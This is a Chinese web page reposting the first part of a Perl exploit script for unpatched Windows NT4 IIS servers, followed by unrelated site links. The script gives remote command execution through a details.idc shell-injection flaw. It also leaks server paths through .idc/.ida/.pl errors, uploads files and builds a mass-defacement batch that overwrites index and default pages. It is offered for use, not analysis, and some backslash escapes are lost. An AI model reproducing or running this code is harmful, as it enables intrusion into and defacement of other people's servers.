攻击NT4没打补丁的perl程序(上)

#!/usr/bin/perl

#####################################################################

# NewDSN.exe/CTGuestB.idc/Details.idc exploit by Scrippie/Phreak.nl #

#####################################################################

# Fuck JP # Version 1.3 #

################################################

# Part of this source has been ripped from RFP #

# Exploit idea also by RFP ######################

# Much love to: Maja, Dopey, Hester # #

# Cheers to: #phreak.nl # Maja, I love you #

################################################ #

# 最新添加的功能 ################################

# - 强制命令模式 # Mail me at: ronald@grafix.nl #

# - 可以上载.html文件 ################################

# - 检测是否 .idc 文件漏洞已经修复 #

#########################################################

# ToDo: #

# <Xphere> gebruik ord() liever #

# <Xphere> #weeh = ord($char); #

# <Xphere> $weeh = ord($char); #

# <Xphere> krijg je nummer #

####################################

use Socket;

use Getopt::Std;

getopts("wcdh:u:fm:g:", %args);

print("NewDSN exploit v 1.3 -- Scrippie / Phreak.nlnn");

if (!defined $args{h}) {

print("Usage: dsnhack.pl -h <host>n");

print("t-c = create a new M$ Access DSN (Web SQL)n");

print("t-d = 通过几个程序溢出得出系统绝对路径n");

print("t-f = 强制命令执行(跳过检测.idc等文件)n");

print("t-g <server:filename> = 通过FTP上载文件到NT服务器n");

print("t-h <host> = 想扫描的主机地址n");

print("t-u <filename> = 上载HTML文件n");

print("t-w = 对Win 95的支持n");

print("t-m <dir /s /b file> = Mass deface (see documentation)n");

exit; }

$host = $args{h};

$target = inet_aton($host) // die("inet_aton problems; host doesn't exist?");

if(defined $args{d}) {

print("* [ Trying to get the hard path with the .idc flaw ] *nn ");

$temp = &idc_bug;

if($temp ne "") { print $temp; }

else { print "Failed..."; }

print("nn* [ Trying to get the hard path with the .ida flaw ] *nn ");

$temp = &ida_bug;

if($temp ne "") { print $temp; }

else { print "Failed..."; }

print("nn* [ Trying to get the hard path with the .pl flaw ] *nn ");

$temp = &pl_bug;

if($temp ne "") { print("$tempn"); }

else { print "Failed...n"; }

exit;

}

if(defined $args{g}) {

&upload_file($args{g});

exit;

}

if(defined $args{u}) {

open(HTMLFILE, "<" . $args{u}) or die "Cannot open $args{u}: $!n";

print("* Now uploading: $args{u} to C:\phreak.htm on $args{h}n ");

while(<HTMLFILE>) {

s/([<^>])/^$1/g; # Escape using the WinNT ^ escape char

s/([x0Dx0A])//g; # Filter r, n chars

s///^/chr(124)//g; # Convert / chars

s/"/^/chr(34)//g; # Convert " chars

s/&/^/chr(38)//g; # Convert & chars

if($_ ne "") {

$upcmd = "cmd /c echo " . $_ . " >> C:\phreak.htm";

&exec_cmd($upcmd);

}

}

print("Done!n");

close(HTMLFILE);

exit;

}

if(defined $args{m}) {

&list_deface_bat($args{m});

exit;

}

if(defined $args{c}) {

if(!defined $args{f}) {

print("* [Checking for necessary files] *nn");

&check_cgis;

}

else { print("* Forced command mode on - Skipping checksn"); }

print("n* Now trying to create "Web SQL" DSN... ");

if(&make_dsn == 0) { print("<failed> *n"); exit; }

else { print("<success> *n"); }

print("nInitializing GuestBook by GETting ctguestb.idcn");

&init_gb;

}

else {

if(!defined $args{f}) {

print("Checking for: details.idct-- ");

if(&check_details == 0) { print("Not Found :(n"); exit; }

else { print("Found :)n"); }

}

else { print("* Forced command mode on - Skipping checksn"); }

}

if (defined $args{w}) { $comm="command /c"; } else { $comm="cmd /c"; }

print("nType the command line you want to run ($comm assumed):n");

print("$comm ");

$in=<STDIN>

chomp $in;

$command="$comm " . $in ;

&exec_cmd($command);

######################################

# 用details.idc来执行系统命令 #

######################################

sub exec_cmd {

my ($command) = @_;

$command =~ s/s/+/g; # Convert spaces to plusses (%20 will also work)

sendraw("GET /scripts/samples/details.idc?Fname=hi&Lname=/shell("$command")/"

. " HTTP/1.0nn");

}

###########################################

# 上载.bat文件 #

###########################################

sub list_deface_bat {

my ($dir_file) = @_;

open(DIRFILE, $dir_file) or die "Cannot open $args{m}: $!n";

print("--- Go and have a beer - this will take a whilenn");

while(<DIRFILE>) {

s/([x0Ax0D])//; # Yes, I dislike chop() - it doesn't cope with rn newlines

# in a *nix environment

if(/index.htm/ // /index.asp/ // /default.htm/ // /default.asp/ //

/home.htm/ // /home.asp/ // /main.htm/ // /main.asp/ // /inhoud.htm/

// /inhoud.asp/ // /index.stm/) {

print(" Adding $_ to our mass deface batch filen");

&exec_cmd("cmd /c echo copy C:\phreak.htm $_ >> c:\phjear.bat");

}

}

print("n* Behave and don't run C:\phjear.bat You Filthy ScR/pT K1dx0r!n");

print(" Oh, did you know this stuff is VERY easy to spot in the logs? *grin*

n");

}

• ·简单的PERL－ADO例子
• ·贺卡CGI脚本程序在NT下的实现
• ·智慧人生(中青年学者访谈)|报价￥23.50|
• ·攻击NT4没打补丁的perl程序（下）
• ·中国的使臣(卜弥格)/当代海外汉学名著译丛|报
• ·多文件上传小程序一个
• ·毛主席教我们当省委书记|报价￥16.20|图书
• ·菜鸟的迷你留言本（perl版）
• ·perl中dbi句柄和返回操作实例
• ·穆罕默德/世界大人物丛书|报价￥7.30|图书